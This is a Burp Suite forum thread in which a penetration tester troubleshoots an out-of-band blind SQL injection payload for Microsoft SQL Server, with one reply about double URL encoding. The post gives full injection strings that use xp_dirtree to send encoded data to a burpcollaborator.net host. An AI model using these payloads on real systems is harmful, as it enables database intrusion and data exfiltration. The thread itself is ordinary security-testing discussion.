Burp Suite User Forum

Login to post

An issue in payload for the OOB SQL injection detection

tom | Last updated: Jan 12, 2022 09:44AM UTC

Hi, In my recent penetration testing I discovered a few instances of Blind SQL Injection in a .NET application with a "Microsoft SQL Server 2000" back-end database system. I used the following payload for the OOB SQL injection detection : test';declare @q varchar(99);set @q='\\aaa.bXkgY3JlZGl0IGNhcmQgbnVtYmVyIGlz.burpcollaborator.net\test'; exec master.dbo.xp_dirtree @q;-- everything is OK. But when I changed the payload a little like this: test';declare @q varchar(99);set @q='\\aaa.'+'bXkgY3JlZGl0IGNhcmQgbnVtYmVyIGlz.burpcollaborator.net\test'; exec master.dbo.xp_dirtree @q;-- then I failed to find the response in collaborator client. Every time I URL_encoded all the “key characters” in the payloads. I spent several days on it and can't figure out what the problem is.Can anyone help me?

James | Last updated: Jan 13, 2022 10:56AM UTC

Maybe they're doing a double-decode so the + needs to be %252b

tom | Last updated: Jan 17, 2022 12:20AM UTC

@James,thanks your reply.I tried it,but it was not that case.

You need to Log in to post a reply. Or register here, for free.